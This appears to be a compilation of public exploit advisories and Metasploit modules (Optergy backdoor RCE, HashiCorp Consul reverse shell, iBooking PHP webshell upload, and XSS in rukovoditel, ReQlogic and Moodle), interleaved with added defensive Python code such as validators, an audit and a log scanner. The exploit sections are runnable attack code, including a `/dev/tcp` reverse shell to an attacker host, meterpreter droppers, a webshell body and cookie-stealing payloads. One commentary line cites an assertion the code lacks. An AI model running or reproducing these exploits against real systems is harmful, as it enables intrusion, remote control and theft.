/> rescue Rex::Proto::Amqp::Error::AmqpError => e<br /> fail_with(Failure::Unknown, e.message)<br /> ensure<br /> amqp_client.close<br /> end<br />end<br /></code></pre>
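The module above publishes a message whose `message_type` property names `System.Windows.Data.ObjectDataProvider` and whose body is a Json.NET-serialised gadget chain; the consumer deserialises the body by the type names it carries. The check below is an added example, not code from the module or from SolarWinds: it is the consumer-side counterpart of a restrictive `SerializationBinder`, written in Python so it runs here, which walks the JSON body for `$type` members and rejects the message unless every type, and the declared `message_type`, is on an allowlist. The gadget body is a constructed approximation of an ObjectDataProvider chain (the assembly-qualified names are illustrative), and `Example.Swis.Indication` is a hypothetical message type standing in for whatever the real consumer expects.

```python
import json

# Constructed approximation of the message the module publishes: Json.NET output whose "$type"
# members name the ObjectDataProvider gadget and the Process it ends up starting. The assembly
# names and versions are illustrative, not copied from any tool.
GADGET_BODY = json.dumps({
    "$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, "
             "Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName": "Start",
    "ObjectInstance": {
        "$type": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, "
                 "PublicKeyToken=b77a5c561934e089",
        "StartInfo": {
            "$type": "System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, "
                     "Culture=neutral, PublicKeyToken=b77a5c561934e089",
            "FileName": "cmd",
            "Arguments": "/c whoami",
        },
    },
})
GADGET_PROPERTIES = {"message_type": "System.Windows.Data.ObjectDataProvider"}

# A benign message of a hypothetical type the consumer actually expects.
BENIGN_BODY = json.dumps({"$type": "Example.Swis.Indication, Example.Swis",
                          "Source": "Orion.Nodes", "Action": "Changed"})
BENIGN_PROPERTIES = {"message_type": "Example.Swis.Indication"}

# Hypothetical allowlist; in practice it comes from the consumer's message contract.
ALLOWED_TYPES = {"Example.Swis.Indication"}


def dotnet_types_in(document):
    """Walk a parsed JSON document and collect every '$type' value, outermost first."""
    found = []

    def walk(node):
        if isinstance(node, dict):
            t = node.get("$type")
            if isinstance(t, str):
                found.append(t)
            for value in node.values():
                walk(value)
        elif isinstance(node, list):
            for value in node:
                walk(value)

    walk(document)
    return found


def simple_type_name(assembly_qualified):
    """'Ns.Type, Assembly, Version=...' -> 'Ns.Type'."""
    return assembly_qualified.split(",", 1)[0].strip()


def embedded_types(body):
    """Simple names of every .NET type a Json.NET body asks the deserializer to instantiate."""
    return [simple_type_name(t) for t in dotnet_types_in(json.loads(body))]


def message_is_allowed(properties, body, allowed=ALLOWED_TYPES):
    """Accept a message only when the declared message_type and every embedded $type are allowlisted.
    The header alone is not enough: the publisher controls it, so the body is checked as well."""
    declared = properties.get("message_type")
    if declared not in allowed:
        return False, f"message_type {declared!r} not allowed"
    try:
        types = embedded_types(body)
    except ValueError:
        return False, "body is not valid JSON"
    for t in types:
        if t not in allowed:
            return False, f"embedded $type {t!r} not allowed"
    return True, "ok"


if __name__ == "__main__":
    print(message_is_allowed(GADGET_PROPERTIES, GADGET_BODY))
    print(message_is_allowed(BENIGN_PROPERTIES, BENIGN_BODY))
    print(message_is_allowed(BENIGN_PROPERTIES, GADGET_BODY))  # spoofed header, gadget body
```

On the .NET side the equivalent fix is to deserialise with `TypeNameHandling.None`, or with a `SerializationBinder` that resolves only the expected types; an allowlist on the AMQP credentials and routing keys limits who can reach the consumer at all but does not make the deserialiser safe.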
<pre><code>## Title: rukovoditel 3.2.1 - Cross-Site Scripting (XSS)<br />## Author: nu11secur1ty<br />## Date: 11.03.2022<br />## Vendor: https://www.rukovoditel.net/<br />## Software: https://sourceforge.net/projects/rukovoditel/files/rukovoditel_3.2.1.zip/download<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1<br /><br />## Description:<br />The application is vulnerable to DOM-based cross-site scripting<br />attacks. Data is read from `location.hash` and passed to<br />`jQuery.parseHTML`.<br />The attacker can use this vulnerability to create an unlimited number<br />of accounts on this system until it crashes.<br /><br />## STATUS: HIGH Vulnerability - CRITICAL<br /><br />[+] Payload:<br /><br />```http<br />GET /rukovoditel/index.php?module=users/restore_password HTTP/1.1<br />Host: pwnedhost.com<br />Accept-Encoding: gzip, deflate<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Cookie: sid=jf2mf72r2kfakhhnn6evgusrcg; cookie_test=please_accept_for_session; app_login_redirect_to=module%3Ddashboard%2F<br />Upgrade-Insecure-Requests: 1<br />Referer: http://pwnedhost.com/rukovoditel/index.php?module=users/login<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/i1qmfk)<br /><br />## Time spent<br />`3:45`<br /><br /></code></pre>
<pre><code># Exploit Title: iBooking v1.0.8 - Arbitrary File Upload<br /># Exploit Author: d1z1n370/oPty<br /># Date: 01/11/2022<br /># Vendor Homepage: https://codecanyon.net/item/ibooking-laravel-booking-system/30362088<br /># Tested on: Linux<br /># Version: 1.0.8<br /><br /># Exploit Description:<br />The application is prone to an arbitrary file upload vulnerability because it does not adequately validate the extension or content of user-supplied files: the request below stores PHP code under a ".php56" filename behind a GIF header. An attacker can exploit this issue to upload arbitrary files in the context of the web server process and execute commands.<br /><br /><br /># PoC request<br /><br />POST https://localhost/dashboard/upload-new-media HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/108.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Referer: https://localhost/dashboard/settings<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------115904534120015298741783774062<br />Content-Length: 449<br />Connection: close<br />Cookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c<br /><br />-----------------------------115904534120015298741783774062<br />Content-Disposition: form-data; name="_token"<br /><br />kVTpp66poSLeJVYgb1sM6F7KIzQV2hbVfQLaUEEW<br />-----------------------------115904534120015298741783774062<br />Content-Disposition: form-data; name="is_modal"<br /><br />1<br />-----------------------------115904534120015298741783774062<br />Content-Disposition: form-data; name="file"; filename="upload.php56"<br />Content-Type: image/gif<br /><br />GIF89a;<br /><?php system($_GET['a']); phpinfo(); ?><br />-----------------------------115904534120015298741783774062--<br /><br /></code></pre>
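The PoC above combines two evasions: a filename extension (`.php56`) that a denylist of script extensions is unlikely to contain, and a `GIF89a` prefix so that a magic-byte sniff reports an image. The validator below is an added example, not iBooking's code or a patch for it: it puts a naive denylist next to an allowlist that requires the extension and the leading bytes to agree, and stores the file under a server-chosen name. The file content is a constructed copy of the PoC body; the extension and signature tables are this example's own.

```python
import os
import secrets

# Naive denylist of the sort a weak upload handler might use; "php56" is not on it.
DENYLISTED_EXTENSIONS = {"php", "phtml", "php3", "php4", "php5", "phar"}

# Allowlist of image types a media endpoint is meant to accept, each with the bytes it must start with.
ALLOWED_IMAGE_TYPES = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
}
EXTENSION_ALIASES = {"jpeg": "jpg"}

# Constructed copy of the PoC's file content above: a GIF header followed by PHP.
POC_CONTENT = b"GIF89a;\n<?php system($_GET['a']); phpinfo(); ?>\n"


def extension_of(filename):
    """Lower-cased final extension with aliases folded, or '' when there is none."""
    ext = os.path.splitext(os.path.basename(filename))[1].lstrip(".").lower()
    return EXTENSION_ALIASES.get(ext, ext)


def denylist_accepts(filename):
    """The weak check: rejects only the script extensions it knows about, so odd variants pass."""
    return extension_of(filename) not in DENYLISTED_EXTENSIONS


def magic_matches(ext, content):
    """Do the leading bytes match one of the signatures registered for this extension?"""
    return any(content.startswith(sig) for sig in ALLOWED_IMAGE_TYPES.get(ext, ()))


def allowlist_accepts(filename, content):
    """The stronger check: the extension must be one we serve as an image, and the bytes must agree with it.
    The client's Content-Type header is deliberately ignored; it is as attacker-controlled as the filename."""
    ext = extension_of(filename)
    return ext in ALLOWED_IMAGE_TYPES and magic_matches(ext, content)


def stored_name(filename, content):
    """Server-chosen storage name: the validated extension on a random stem, never the client's name."""
    if not allowlist_accepts(filename, content):
        raise ValueError("upload rejected")
    return f"{secrets.token_hex(16)}.{extension_of(filename)}"


if __name__ == "__main__":
    print("denylist lets upload.php56 through:", denylist_accepts("upload.php56"))
    print("allowlist accepts upload.php56:", allowlist_accepts("upload.php56", POC_CONTENT))
    print("allowlist accepts the same bytes as upload.gif:", allowlist_accepts("upload.gif", POC_CONTENT))
    print("stored as:", stored_name("upload.gif", POC_CONTENT))
```

Whether the server executes a `.php56` file depends on its handler configuration; the point is that a denylist has to enumerate every such variant and an allowlist does not. The last assertion in the usage above is the honest caveat: the PoC's bytes still pass as `upload.gif`, because a polyglot can satisfy both the extension and the signature. What makes that harmless is storing the file under an image extension in a directory the web server never executes scripts from, and serving it with a fixed image Content-Type.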
<pre><code># Exploit Title: ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)<br /># Date: 9 October 2022<br /># Exploit Author: Okan Kurtulus<br /># Vendor Homepage: https://reqlogic.com<br /># Version: 11.3<br /># Tested on: Linux<br /># CVE: CVE-2022-41441<br /><br /># Proof of Concept:<br />1- Install ReQlogic v11.3<br />2- Go to https://localhost:81/ProcessWait.aspx?POBatch=test&WaitDuration=3<br />3- XSS is triggered when the payload below is supplied in either the POBatch or the WaitDuration parameter.<br /><br /># XSS Payload:<br /></script><script>alert(1)</script><br /><br /># Affected Parameters<br />POBatch<br />WaitDuration<br /><br /># Final URLs<br />http://20.36.214.225:81/ProcessWait.aspx?POBatch=</script><script>alert(1)</script>&WaitDuration=3<br />http://20.36.214.225:81/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(1)</script><br /><br /></code></pre>
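The payload above opens with `</script>`, which is the shape used when a parameter is reflected inside an existing script block: the HTML tokenizer ends the script element at the first `</script` it sees, regardless of JavaScript string syntax, so escaping quotes is not enough. The block below is an added example, not ReQlogic's code, showing the three renderings side by side: quote-only escaping (bypassed), a JSON-encoded literal with `<`, `>` and `&` written as `\uXXXX` (safe in a script block), and entity encoding for the case where the value lands in element content instead. The variable name `poBatch` and the page fragments are constructed.

```python
import html
import json
import re

# The payload from the advisory above.
PAYLOAD = "</script><script>alert(1)</script>"


def quote_escape_only(value):
    """Common but insufficient 'JS escaping': backslash-escape quotes and backslashes, nothing else."""
    return value.replace("\\", "\\\\").replace("'", "\\'")


def js_string_literal(value):
    """A string literal that is safe inside a <script> block: JSON-encode, then write the characters
    the HTML tokenizer cares about as JavaScript unicode escapes (JSON.parse-compatible)."""
    encoded = json.dumps(value)
    return (encoded.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")
                   .replace("\u2028", "\\u2028").replace("\u2029", "\\u2029"))


def render_with_quote_escaping(po_batch):
    """Vulnerable rendering: the value is dropped into a JS string with quotes escaped only."""
    return f"<script>var poBatch = '{quote_escape_only(po_batch)}';</script>"


def render_with_js_literal(po_batch):
    """Hardened rendering of the same page fragment."""
    return f"<script>var poBatch = {js_string_literal(po_batch)};</script>"


def render_in_html_body(po_batch):
    """Reflection into element content, where HTML entity encoding is the right tool."""
    return f"<p>Waiting for batch {html.escape(po_batch)}</p>"


def script_blocks(page):
    """What the HTML tokenizer sees: how many script elements the page actually opens."""
    return len(re.findall(r"<script\b", page, re.IGNORECASE))


if __name__ == "__main__":
    for name, render in (("quote-escaped", render_with_quote_escaping),
                         ("js literal", render_with_js_literal),
                         ("html body", render_in_html_body)):
        page = render(PAYLOAD)
        print(f"{name}: {script_blocks(page)} script element(s)\n  {page}")
```

The quote-escaped rendering ends up with two script elements, the second one being the attacker's; the JSON-literal rendering keeps one, and the browser still reads `poBatch` as the original string because `\u003c` is a valid JavaScript escape. Encoding has to match the context the value lands in, which is why the same helper cannot be reused for an attribute or a URL.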
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br />  Rank = ExcellentRanking<br /><br />  include Msf::Exploit::Remote::HttpClient<br />  include Msf::Exploit::CmdStager<br />  prepend Msf::Exploit::Remote::AutoCheck<br /><br />  def initialize(info = {})<br />    super(<br />      update_info(<br />        info,<br />        'Name' => 'Optergy Proton and Enterprise BMS Command Injection using a backdoor',<br />        'Description' => %q{<br />          This module exploits an undocumented backdoor vulnerability in the Optergy Proton and Enterprise<br />          Building Management System (BMS) applications. Versions `2.0.3a` and below are vulnerable.<br />          Attackers can exploit this issue by directly navigating to an undocumented backdoor script<br />          called Console.jsp in the tools directory and gain full system access.<br />          Successful exploitation results in `root` command execution using `sudo` as user `optergy`.<br />        },<br />        'License' => MSF_LICENSE,<br />        'Author' => [<br />          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF Module contributor<br />          'Gjoko Krstic <gjoko[at]applied-risk.com>' # Discovery<br />        ],<br />        'References' => [<br />          [ 'CVE', '2019-7276'],<br />          [ 'URL', 'https://applied-risk.com/resources/ar-2019-008' ],<br />          [ 'URL', 'https://optergy.com/products/proton/' ],<br />          [ 'URL', 'https://optergy.com/products/optergy-enterprise/' ],<br />          [ 'URL', 'https://attackerkb.com/topics/QrYFIjnd3J/cve-2019-7276' ],<br />          [ 'EDB', '47641'],<br />          [ 'PACKETSTORM', '155258']<br />        ],<br />        'DisclosureDate' => '2019-11-05',<br />        'Platform' => ['unix', 'linux'],<br />        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],<br />        'Privileged' => true,<br />        'Targets' => [<br />          [<br />            'Unix Command',<br />            {<br />              'Platform' => 'unix',<br />              'Arch' => ARCH_CMD,<br />              'Type' => :unix_cmd,<br />              'Payload' => { 'BadChars' => "\x20" },<br />              'DefaultOptions' => {<br />                'PAYLOAD' => 'cmd/unix/reverse_bash'<br />              }<br />            }<br />          ],<br />          [<br />            'Linux Dropper',<br />            {<br />              'Platform' => 'linux',<br />              'Arch' => [ARCH_X64, ARCH_X86],<br />              'Type' => :linux_dropper,<br />              'CmdStagerFlavor' => [ 'wget', 'printf', 'echo' ],<br />              'DefaultOptions' => {<br />                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'<br />              }<br />            }<br />          ]<br />        ],<br />        'DefaultTarget' => 0,<br />        'DefaultOptions' => {<br />          'RPORT' => 80,<br />          'SSL' => false<br />        },<br />        'Notes' => {<br />          'Stability' => [CRASH_SAFE],<br />          'Reliability' => [REPEATABLE_SESSION],<br />          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br />        }<br />      )<br />    )<br />    register_options(<br />      [<br />        OptBool.new('SUDO', [ true, 'Set the sudo option to get root privileges', false ])<br />      ]<br />    )<br />  end<br /><br />  def execute_command(cmd, _opts = {})<br />    # Step 1: get the challenge and compute the response answer for the backdoor execution<br />    res = send_request_cgi({<br />      'method' => 'GET',<br />      'uri' => normalize_uri(target_uri.path, '/tools/ajax/ConsoleResult.html?get')<br />    })<br />    if res.nil? || (res.code != 200)<br />      return nil<br />    else<br />      # Get and create a challenge response<br />      res_json = res.get_json_document<br />      return nil if res_json.nil? || res_json.blank?<br /><br />      # Get the challenge<br />      challenge = res_json['response']['message']<br />      # Make SHA1 hash from received challenge<br />      h1 = Digest::SHA1.hexdigest challenge<br />      # Make MD5 hash from SHA1 hash<br />      h2 = Digest::MD5.hexdigest h1<br />      # Combine MD5 hash and SHA1 hash as answer (response) to the challenge<br />      answer = h1 + h2<br />    end<br /><br />    # Step 2: execute payload (RCE) using the backdoor and challenge response obtained from step 1.<br />    if target['Type'] == :linux_dropper<br />      cmd = cmd.gsub(' ') { '${IFS}' }<br />    end<br /><br />    if datastore['SUDO']<br />      payload = "sudo bash -c #{cmd}"<br />    else<br />      payload = "bash -c #{cmd}"<br />    end<br /><br />    res = send_request_cgi({<br />      'method' => 'POST',<br />      'uri' => normalize_uri(target_uri.path, '/tools/ajax/ConsoleResult.html'),<br />      'ctype' => 'application/x-www-form-urlencoded',<br />      'vars_post' => {<br />        'command' => payload,<br />        'challenge' => challenge,<br />        'answer' => answer<br />      }<br />    })<br />    if res.nil? || (res.code != 200)<br />      return nil<br />    else<br />      # get result and return the command response<br />      res_json = res.get_json_document<br />      return nil if res_json.nil? || res_json.blank?<br /><br />      res_cmd_output = res_json['response']['message']<br />      return res_cmd_output<br />    end<br />  end<br /><br />  # Checking if the target is vulnerable by executing the whoami command via the backdoor<br />  def check<br />    res = execute_command('whoami')<br />    return Exploit::CheckCode::Safe unless res && (res.chomp == 'root' || res.chomp == 'optergy')<br /><br />    Exploit::CheckCode::Vulnerable<br />  end<br /><br />  def exploit<br />    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br />    case target['Type']<br />    when :unix_cmd<br />      res = execute_command(payload.encoded)<br />      fail_with(Failure::PayloadFailed, "#{datastore['PAYLOAD']} failed.") if res.nil?<br />    when :linux_dropper<br />      # Don't check the response here since the server won't respond<br />      # if the payload is successfully executed.<br />      execute_cmdstager<br />    end<br />  end<br />end<br /></code></pre>
<pre><code># Exploit Title: HashiCorp Consul v1.0 - Remote Command Execution (RCE)<br /># Date: 26/10/2022<br /># Exploit Author: GatoGamer1155, 0bfxgh0st<br /># Vendor Homepage: https://www.consul.io/<br /># Description: Exploit to gain a reverse shell via Remote Command Execution through the API<br /># References: https://www.consul.io/api/agent/service.html<br /># Tested on: Ubuntu Server<br /># Software Link: https://github.com/hashicorp/consul<br /><br />import sys<br /><br />import requests<br /><br />if len(sys.argv) < 6:<br />    print(f"\n[\033[1;31m-\033[1;37m] Usage: python3 {sys.argv[0]} <rhost> <rport> <lhost> <lport> <acl_token>\n")<br />    sys.exit(1)<br /><br /># Agent service registration endpoint; the registered check's Args are executed by the agent itself<br />target = f"http://{sys.argv[1]}:{sys.argv[2]}/v1/agent/service/register"<br />headers = {"X-Consul-Token": sys.argv[5]}<br />body = {<br />    "Address": "127.0.0.1",<br />    "check": {"Args": ["/bin/bash", "-c", f"bash -i >& /dev/tcp/{sys.argv[3]}/{sys.argv[4]} 0>&1"], "interval": "10s", "Timeout": "864000s"},<br />    "ID": "gato",<br />    "Name": "gato",<br />    "Port": 80,<br />}<br /><br />try:<br />    response = requests.put(target, headers=headers, json=body)<br />    response.raise_for_status()  # a rejected registration (e.g. bad token) is an error, not a success<br />    print("\n[\033[1;32m+\033[1;37m] Request sent successfully, check your listener\n")<br />except requests.exceptions.RequestException as err:<br />    print(f"\n[\033[1;31m-\033[1;37m] Something went wrong ({err}), check the connection and try again\n")<br /><br /></code></pre>
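As an added defensive counterpart (not part of the exploit above and not Consul's own code), the following Python audits captured service-registration bodies for script checks like the one the exploit registers, and classifies what an agent's `enable_script_checks` / `enable_local_script_checks` setting permits; the sample registrations are constructed and the command is a placeholder.

```python
"""Audit Consul service registrations for script checks (added example, not
part of the exploit above). The body it sends carries a check with "Args", a
command the agent itself runs; these helpers flag such checks in captured
registration bodies and classify an agent config's script-check setting."""
from typing import Any

def _lower_keys(obj: Any) -> Any:
    """Lower-case dict keys recursively: the agent accepted the exploit's
    lower-case "check"/"interval" keys, so an audit must ignore key case."""
    if isinstance(obj, dict):
        return {str(k).lower(): _lower_keys(v) for k, v in obj.items()}
    if isinstance(obj, list):
        return [_lower_keys(v) for v in obj]
    return obj

def find_script_checks(registration: dict) -> list:
    """Return one finding per check that would run a command (Args set)."""
    reg = _lower_keys(registration)
    checks = [reg["check"]] if isinstance(reg.get("check"), dict) else []
    checks += [c for c in reg.get("checks", []) if isinstance(c, dict)]
    findings = []
    for chk in checks:
        args = chk.get("args")
        if isinstance(args, list) and args:
            findings.append({"service": reg.get("id") or reg.get("name"),
                             "command": " ".join(str(a) for a in args)})
    return findings

def script_checks_allowed(agent_config: dict) -> str:
    """'remote' if any API client may register script checks (what the exploit
    above relies on), 'local' if only loopback clients may, else 'disabled'."""
    cfg = _lower_keys(agent_config)
    if cfg.get("enable_script_checks"):
        return "remote"
    if cfg.get("enable_local_script_checks"):
        return "local"
    return "disabled"

# Constructed samples: the exploit's registration shape with the command
# replaced by a placeholder, and a benign HTTP health check.
SAMPLE_REGISTRATION = {
    "Address": "127.0.0.1", "ID": "gato", "Name": "gato", "Port": 80,
    "check": {"Args": ["/bin/bash", "-c", "<command>"], "interval": "10s"},
}
BENIGN_REGISTRATION = {
    "ID": "web", "Name": "web", "Port": 8080,
    "Checks": [{"HTTP": "http://127.0.0.1:8080/health", "Interval": "10s"}],
}
```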
<pre><code># Exploit Title: Moodle LMS 4.0 - Cross-Site Scripting (XSS)<br /># Date: 26/10/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://moodle.org/<br /># Software Link: https://git.in.moodle.com/moodle<br /># Version: 4.0<br /># Tested on: XAMPP, Windows 10<br /># Contact: https://twitter.com/dmaral3noz<br /><br />Description:<br /><br />A Cross-Site Scripting (XSS) vulnerability exists in Moodle, a free and open-source Learning Management System (LMS) written in PHP and distributed under the GNU General Public License.<br /><br />Vulnerable Code:<br /><br />line 111 in file "course/search.php"<br /><br />echo $courserenderer->search_courses($searchcriteria);<br /><br /><br />Steps to exploit:<br />1) Go to http://localhost/course/search.php<br />2) Insert your payload in the "search" field<br /><br />Proof of concept (PoC):<br />The following payload will execute the JavaScript:<br />"><img src=# onerror=alert(document.cookie)><br /><br /></code></pre>
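An added detection example covering both the Optergy module above and this Moodle advisory (not code from either author): it scans web-server access-log lines for the backdoor endpoints the module requests and for `course/search.php` requests whose `search` parameter carries markup; the log lines and the marker heuristic are constructed for illustration.

```python
"""Flag web-server log lines matching the two web issues above (added
example, not from either advisory): hits on the Optergy backdoor endpoints
(Console.jsp and tools/ajax/ConsoleResult.html, from the module) and Moodle
course/search.php requests whose "search" term carries markup like the XSS
payload shown. Log lines below are constructed; the markers are a heuristic."""
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Common/Combined Log Format: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
OPTERGY_PATHS = ("/tools/console.jsp", "/tools/ajax/consoleresult.html")
# Tag openers, inline event handlers and javascript: URLs in a search term.
XSS_MARKERS = re.compile(r"<\s*/?\s*[a-z]+|\bon[a-z]+\s*=|javascript:", re.I)

def classify(line: str) -> Optional[str]:
    """Label one log line: 'optergy_backdoor', 'moodle_search_xss' or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("path"))
    path = unquote(url.path).lower()
    if path.endswith(OPTERGY_PATHS):
        return "optergy_backdoor"
    if path.endswith("/course/search.php"):
        # parse_qs percent-decodes, so encoded payloads are inspected in clear.
        if any(XSS_MARKERS.search(t) for t in parse_qs(url.query).get("search", [])):
            return "moodle_search_xss"
    return None

def scan(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (client ip, label, request path) for every flagged line."""
    hits = []
    for line in lines:
        label = classify(line)
        if label:
            m = LOG_RE.match(line)
            hits.append((m.group("ip"), label, m.group("path")))
    return hits

SAMPLE_LOG = """\
203.0.113.5 - - [05/Nov/2019:10:00:01 +0000] "GET /tools/Console.jsp HTTP/1.1" 200 512
203.0.113.5 - - [05/Nov/2019:10:00:02 +0000] "GET /tools/ajax/ConsoleResult.html?get HTTP/1.1" 200 88
203.0.113.5 - - [05/Nov/2019:10:00:03 +0000] "POST /tools/ajax/ConsoleResult.html HTTP/1.1" 200 140
198.51.100.7 - - [26/Oct/2022:12:00:00 +0000] "GET /course/search.php?search=%22%3E%3Cimg+src%3D%23+onerror%3Dalert%281%29%3E HTTP/1.1" 200 9031
198.51.100.8 - - [26/Oct/2022:12:00:05 +0000] "GET /course/search.php?search=linear+algebra HTTP/1.1" 200 9031
192.0.2.9 - - [26/Oct/2022:12:01:00 +0000] "GET /index.php HTTP/1.1" 200 4400
""".splitlines()
```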